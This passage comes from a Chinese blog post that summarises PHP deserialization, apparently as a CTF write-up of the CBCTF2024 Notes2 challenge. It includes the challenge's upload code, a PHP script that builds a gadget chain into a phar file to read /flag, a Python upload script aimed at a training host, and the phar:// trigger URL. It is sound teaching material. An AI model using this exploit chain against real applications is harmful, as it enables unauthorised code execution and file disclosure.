<span class="hljs-variable">$realPath</span> = <span class="hljs-title function_ invoke__">realpath</span>(<span class="hljs-variable">$filePath</span>);<br>    <span class="hljs-keyword">if</span> (<span class="hljs-title function_ invoke__">strpos</span>(<span class="hljs-variable">$realPath</span>, <span class="hljs-string">&#x27;/notes&#x27;</span>) === <span class="hljs-number">0</span> ) &#123;<br>        <span class="hljs-keyword">return</span> <span class="hljs-literal">true</span>;<br>    &#125;<br>    <span class="hljs-keyword">return</span> <span class="hljs-literal">false</span>; <br>&#125;<br><br><span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">listnote</span>(<span class="hljs-params"></span>) </span>&#123;<br>    <span class="hljs-variable">$directory</span> = <span class="hljs-string">&#x27;/notes&#x27;</span>; <br>    <span class="hljs-variable">$files</span> = <span class="hljs-title function_ invoke__">array_filter</span>(<span class="hljs-title function_ invoke__">scandir</span>(<span class="hljs-variable">$directory</span>), function (<span class="hljs-variable">$file</span>) <span class="hljs-keyword">use</span> ($<span class="hljs-title">directory</span>) &#123;<br>        <span class="hljs-title">return</span> <span class="hljs-title">is_file</span>(&quot;$<span class="hljs-title">directory</span>/$<span class="hljs-title">file</span>&quot;);<br>    &#125;);<br>    <span class="hljs-keyword">foreach</span> (<span class="hljs-variable">$files</span> <span class="hljs-keyword">as</span> <span class="hljs-variable">$f</span>) &#123;<br>        <span class="hljs-variable">$link</span> = <span class="hljs-string">&#x27;&lt;a href=&quot;/index.php?note=/notes/&#x27;</span> . <span class="hljs-title function_ invoke__">htmlspecialchars</span>(<span class="hljs-variable">$f</span>) . <span class="hljs-string">&#x27;&quot;&gt;&#x27;</span> . <span class="hljs-title function_ invoke__">htmlspecialchars</span>(<span class="hljs-variable">$f</span>) . <span class="hljs-string">&#x27;&lt;/a&gt; &lt;p&gt;&lt;/p&gt;&#x27;</span>;<br>        <span class="hljs-keyword">echo</span> <span class="hljs-variable">$link</span>;<br>    &#125;<br>    <span class="hljs-keyword">echo</span> <span class="hljs-string">&#x27;&lt;a href=&quot;/index.php?note=show-me-source&quot;&gt;show source&lt;/a&gt;&#x27;</span>;<br>&#125;<br><br><span class="hljs-comment">// upload your own note ? (under development)</span><br><span class="hljs-keyword">if</span> (<span class="hljs-variable">$_SERVER</span>[<span class="hljs-string">&#x27;REQUEST_METHOD&#x27;</span>] === <span class="hljs-string">&#x27;POST&#x27;</span>) &#123;<br>    <span class="hljs-variable">$file</span> = <span class="hljs-variable">$_FILES</span>[<span class="hljs-string">&#x27;user_note&#x27;</span>] ?? <span class="hljs-literal">null</span>;<br>    <span class="hljs-keyword">if</span> (<span class="hljs-variable">$file</span> &amp;&amp; <span class="hljs-title function_ invoke__">strtolower</span>(<span class="hljs-title function_ invoke__">pathinfo</span>(<span class="hljs-variable">$file</span>[<span class="hljs-string">&#x27;name&#x27;</span>], PATHINFO_EXTENSION)) === <span class="hljs-string">&#x27;txt&#x27;</span>) &#123;<br>        <span class="hljs-variable">$randomFileName</span> = <span class="hljs-title function_ invoke__">uniqid</span>() . <span class="hljs-string">&#x27;.txt&#x27;</span>;<br>        <span class="hljs-variable">$targetFilePath</span> = <span class="hljs-string">&quot;/notes/&quot;</span> . <span class="hljs-variable">$randomFileName</span>;<br>        <span class="hljs-keyword">if</span> (<span class="hljs-title function_ invoke__">move_uploaded_file</span>(<span class="hljs-variable">$file</span>[<span class="hljs-string">&#x27;tmp_name&#x27;</span>], <span class="hljs-variable">$targetFilePath</span>)) &#123;<br>            <span class="hljs-keyword">echo</span> <span class="hljs-string">&quot;Your note successfully saved in :&quot;</span>.<span class="hljs-variable">$targetFilePath</span>;<br>            <span class="hljs-keyword">exit</span>;<br>        &#125;<br>    &#125;<br>    <span class="hljs-keyword">die</span>(<span class="hljs-string">&quot;error&quot;</span>);   <br>&#125;<br><br><span class="hljs-variable">$note</span> = @<span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;note&#x27;</span>];<br><span class="hljs-keyword">if</span>(<span class="hljs-variable">$note</span>)&#123;<br>    <span class="hljs-keyword">if</span>(<span class="hljs-variable">$note</span> === <span class="hljs-string">&quot;show-me-source&quot;</span>)&#123;<br>        <span class="hljs-title function_ invoke__">highlight_file</span>(<span class="hljs-keyword">__FILE__</span>);<br>    &#125;<span class="hljs-keyword">else</span>&#123;<br>        <span class="hljs-keyword">if</span>(<span class="hljs-title function_ invoke__">check</span>(<span class="hljs-variable">$note</span>))&#123;<br>            <span class="hljs-title function_ invoke__">header</span>(<span class="hljs-string">&#x27;Content-Type: text/plain; charset=UTF-8&#x27;</span>);<br>            <span class="hljs-keyword">new</span> <span class="hljs-title function_ invoke__">notes</span>(<span class="hljs-variable">$note</span>);<br>        &#125;<span class="hljs-keyword">else</span>&#123;<br>            <span class="hljs-keyword">die</span>(<span class="hljs-string">&quot;hacker...&quot;</span>);<br>        &#125;<br>    &#125;<br>&#125;<span class="hljs-keyword">else</span>&#123;<br>    <span class="hljs-keyword">echo</span> <span class="hljs-string">&quot;&lt;h1&gt;这里是mak自己悄悄留给你的一些笔记哦，打开看看吧&lt;/h1&gt;&quot;</span>;<br>    <span class="hljs-keyword">echo</span> <span class="hljs-string">&quot;&lt;h2&gt;Notes List:&lt;h2&gt;&quot;</span>;<br>    <span class="hljs-title function_ invoke__">listnote</span>();<br>&#125;<br><br><span class="hljs-comment">//前面写好的链子</span><br><span class="hljs-variable">$ray</span> = <span class="hljs-keyword">new</span> <span class="hljs-title function_ invoke__">_0rays</span>();<br><span class="hljs-variable">$ray</span>-&gt;jbn = <span class="hljs-string">&#x27;phpinfo&#x27;</span>;<br><span class="hljs-variable">$lets</span>=<span class="hljs-keyword">new</span> <span class="hljs-title function_ invoke__">lets</span>();<br><span class="hljs-variable">$lets</span>-&gt;mak4r1=<span class="hljs-string">&#x27;asc&#x27;</span>;<br><span class="hljs-variable">$new_lets1</span>=<span class="hljs-keyword">new</span> <span class="hljs-title function_ invoke__">lets</span>();<br><span class="hljs-variable">$go</span> = <span class="hljs-keyword">new</span> <span class="hljs-title function_ invoke__">go</span>();<br><span class="hljs-variable">$go</span>-&gt;ed_xinhu=<span class="hljs-keyword">new</span> <span class="hljs-title function_ invoke__">lets</span>();<br><span class="hljs-variable">$go</span>-&gt;ed_xinhu-&gt;errmis=<span class="hljs-string">&#x27;/flag&#x27;</span>;<br><span class="hljs-variable">$new_lets1</span>-&gt;ech0=<span class="hljs-variable">$go</span>;<br><span class="hljs-variable">$lets</span>-&gt;rocket=<span class="hljs-variable">$new_lets1</span>;<br><span class="hljs-variable">$ray</span>-&gt;pankas=<span class="hljs-variable">$lets</span>;<br><br><span class="hljs-comment">//生成phar文件</span><br>@<span class="hljs-title function_ invoke__">unlink</span>(<span class="hljs-string">&quot;phar.phar&quot;</span>);    <span class="hljs-comment">//删除之前的phar.phar文件(如果有)</span><br><span class="hljs-variable">$phar</span> = <span class="hljs-keyword">new</span> <span class="hljs-title class_">Phar</span>(<span class="hljs-string">&quot;phar.phar&quot;</span>);<br><span class="hljs-variable">$phar</span>-&gt;<span class="hljs-title function_ invoke__">startBuffering</span>();            <span class="hljs-comment">//开始写文件</span><br><span class="hljs-variable">$phar</span>-&gt;<span class="hljs-title function_ invoke__">setStub</span>(<span class="hljs-string">&quot;&lt;?php __HALT_COMPILER(); ?&gt;&quot;</span>);    <span class="hljs-comment">//写入stu头部信息</span><br><span class="hljs-variable">$phar</span>-&gt;<span class="hljs-title function_ invoke__">setMetadata</span>(<span class="hljs-variable">$ray</span>);    <span class="hljs-comment">//重点！！将构造好的链子写入meta-data也就是manifest字段，这里会自动进行序列化，因此传入链头就行。其实可以理解为serialize（$o）;</span><br><span class="hljs-variable">$phar</span>-&gt;<span class="hljs-title function_ invoke__">addFromString</span>(<span class="hljs-string">&quot;phar.txt&quot;</span>, <span class="hljs-string">&quot;phar&quot;</span>);<br><span class="hljs-variable">$phar</span>-&gt;<span class="hljs-title function_ invoke__">stopBuffering</span>();<br><br><span class="hljs-comment">//本地测试</span><br><span class="hljs-comment">//$serialized = serialize($ray);//在本地序列化观察一下序列化的结果</span><br><span class="hljs-comment">//echo $serialized;</span><br><span class="hljs-comment">//unserialize($serialized);//可以在本地测试一下是否成功</span><br><br><span class="hljs-title function_ invoke__">highlight_file</span>(<span class="hljs-keyword">__FILE__</span>);<br><span class="hljs-meta">?&gt;</span><br></code></pre></td></tr></table></figure>

<p>先根据源码文件上传部分的限制，修改 phar 文件的后缀变为 txt，然后用 python 发送文件到靶机</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">import</span> requests<br><br>url = <span class="hljs-string">&quot;http://e12a0360-5b3b-412a-a898-6edf2af3f94a.training.0rays.club:8001/&quot;</span><br>file = <span class="hljs-built_in">open</span>(<span class="hljs-string">&quot;phar.txt&quot;</span>,<span class="hljs-string">&#x27;rb&#x27;</span>)<br>res = requests.post(url, files=&#123;<span class="hljs-string">&quot;user_note&quot;</span>:file&#125;)<br><span class="hljs-built_in">print</span>(res.text)<br></code></pre></td></tr></table></figure>

<p>上传成功返回上传文件的重命名名称，最后利用 phar 伪协议 <code>phar://</code> 访问文件触发反序列化即可</p>
<p><code>http://（靶机）/index.php?note=phar:///notes/（重命名的文件名.txt）</code></p>
<p><img src="/img/PHP%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%B0%8F%E7%BB%93/2.png" srcset="/img/loading.gif" lazyload></p>
<h3 id="出现的问题"><a href="#出现的问题" class="headerlink" title="出现的问题"></a>出现的问题</h3><h4 id="1-没搞清楚对象的层次结构导致链子构造错误"><a href="#1-没搞清楚对象的层次结构导致链子构造错误" class="headerlink" title="1.没搞清楚对象的层次结构导致链子构造错误"></a>1.没搞清楚对象的层次结构导致链子构造错误</h4><p><img src="/img/PHP%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%B0%8F%E7%BB%93/3.png" srcset="/img/loading.gif" lazyload alt="修改前"></p>
<p><img src="/img/PHP%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%B0%8F%E7%BB%93/4.png" srcset="/img/loading.gif" lazyload alt="修改后"></p>
<h4 id="2-题目看错"><a href="#2-题目看错" class="headerlink" title="2.题目看错"></a>2.题目看错</h4><p>取倒数 2<del>4 位，搞成倒数 1</del>3 位，如上图 mak4r1 均取值错误</p>
<h4 id="3-使用-phar-伪协议触发反序列化错误"><a href="#3-使用-phar-伪协议触发反序列化错误" class="headerlink" title="3.使用 phar 伪协议触发反序列化错误"></a>3.使用 phar 伪协议触发反序列化错误</h4><p>错误 <code>http://（靶机）/index.php?note=phar://notes/（重命名的文件名.txt）</code></p>
<p>正确 <code>http://（靶机）/index.php?note=phar:///notes/（重命名的文件名.txt）</code></p>
<p><code>/notes/（重命名的文件名.txt）</code> 才是正确的文件路径，用 <code>phar://</code> 伪协议包含要反序列化的文件</p>
<h3 id="官方-WP"><a href="#官方-WP" class="headerlink" title="官方 WP"></a>官方 WP</h3><p><a target="_blank" rel="noopener" href="https://0rays-club.feishu.cn/wiki/SoYjwHDSGixa12kk1RYcKQHKnpd">2024 CBCTF WriteUps</a></p>
<p><img src="/img/PHP%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%B0%8F%E7%BB%93/5.png" srcset="/img/loading.gif" lazyload></p>
<h1 id="总结、感悟、收获"><a href="#总结、感悟、收获" class="headerlink" title="总结、感悟、收获"></a>总结、感悟、收获</h1><h2 id="1-如何理解链子的层层调用、对象的结构关系"><a href="#1-如何理解链子的层层调用、对象的结构关系" class="headerlink" title="1.如何理解链子的层层调用、对象的结构关系"></a>1.如何理解链子的层层调用、对象的结构关系</h2><p>既然叫链子，那么就要一环套一环，通过连续的自动调用来达到“利用原本无法利用的源码”的目的。然而，只有当前对象为包含某魔术方法的类的对象时，当前对象触发该魔术方法自动调用的条件，该魔术方法的自动调用才能生效。例如：_0rays 类下含有魔术方法__wakeup()，只有对象 ray 为_0rays 类时，对象 ray 被反序列化（触发调用条件），魔术方法__wakeup()被自动调用。</p>
<p>所以，要让链子依次调用魔术方法，那么<u>上一个对象</u>为上一个目标魔术方法所在的类的对象，<u>上一个对象的属性</u>为下一个目标魔术方法所在的类的对象，从而将一个个魔术方法链接起来。<u>形象地讲就是对象按对应魔术方法的调用顺序依次套娃。</u></p>
<blockquote>
<p>Tips:<br>因为我花了不少功夫才大致搞明白，所以写的比较详细且啰嗦，光看太绕了，最好结合前面 CBCTF2024 Notes2 调试时的变量结构图理解，调试一遍看一下。</p>
</blockquote>
<h1 id="参考资料："><a href="#参考资料：" class="headerlink" title="参考资料："></a>参考资料：</h1><p><a target="_blank" rel="noopener" href="https://xz.aliyun.com/news/11953">https://xz.aliyun.com/news/11953</a></p>
<p><a target="_blank" rel="noopener" href="https://cloud.tencent.com/developer/article/1945248">https://cloud.tencent.com/developer/article/1945248</a></p>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
    <div class="post-meta mr-3 d-flex align-items-center">
      <i class="iconfont icon-category"></i>
      

<span class="category-chains">
  
  
    
      <span class="category-chain">
        
  <a href="/categories/Note-Summary/" class="category-chain-item">Note&amp;Summary</a>
  
  

      </span>
    
  
</span>

    </div>
  
  
    <div class="post-meta">
      <i class="iconfont icon-tags"></i>
      
        <a href="/tags/CTF/" class="print-no-link">#CTF</a>
      
        <a href="/tags/web/" class="print-no-link">#web</a>
      
        <a href="/tags/%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/" class="print-no-link">#反序列化</a>
      
        <a href="/tags/PHP/" class="print-no-link">#PHP</a>
      
    </div>
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>PHP反序列化小结</div>
      <div>http://5i1encee.top/2025/02/01/PHP反序列化小结/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>5i1encee</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2025年2月1日</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>许可协议</div>
          <div>
            
              
              
                <a class="print-no-link" target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - 署名">
                    <i class="iconfont icon-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2025/03/02/Hgame2025%E9%83%A8%E5%88%86%E8%B5%9B%E9%A2%98%E5%A4%8D%E7%8E%B0/" title="Hgame2025 部分赛题复现">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">Hgame2025 部分赛题复现</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2025/01/24/CBCTF2024/" title="CBCTF2024 WP">
                        <span class="hidden-mobile">CBCTF2024 WP</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
  
  
    <article id="comments" lazyload>
      
  <div id="valine"></div>
  <script type="text/javascript">
    Fluid.utils.loadComments('#valine', function() {
      Fluid.utils.createScript('https://lib.baomitu.com/valine/1.5.1/Valine.min.js', function() {
        var options = Object.assign(
          {"appId":"sYa0TwEtqgwqBctM2qchGbMG-gzGzoHsz","appKey":"Et6unsKpmF1YFlS3U5IE9nlB","path":"window.location.pathname","placeholder":"请友好交流哦~ ☆:.٩(๑❛ᴗ❛๑)۶°*☆","avatar":"retro","meta":["nick","mail","link"],"requiredFields":[],"pageSize":10,"lang":"zh-CN","highlight":true,"recordIP":true,"serverURLs":"https://sya0twet.lc-cn-n1-shared.com","emojiCDN":null,"emojiMaps":null,"enableQQ":true},
          {
            el: "#valine",
            path: window.location.pathname
          }
        )
        new Valine(options);
        Fluid.utils.waitElementVisible('#valine .vcontent', () => {
          var imgSelector = '#valine .vcontent img:not(.vemoji)';
          Fluid.plugins.imageCaption(imgSelector);
          Fluid.plugins.fancyBox(imgSelector);
        })
      });
    });
  </script>
  <noscript>Please enable JavaScript to view the comments</noscript>


    </article>
  


          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>目录</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <footer class="mt-4"> <font size="2" face="Georgia"> <div class="text-center py-3"> <div style="font-size: 0.85rem"> <span id="timeDate">载入天数...</span> <span id="times">载入时分秒...</span> <script src="/js/duration.js"></script> </div> <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
    </div>
  
  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.4/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.20.1/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/4.3.1/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script defer src="/js/leancloud.js" ></script>

  <script  src="/js/local-search.js" ></script>




  
<script src="/js/mouse_move.js"></script>



<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
</body>
</html>
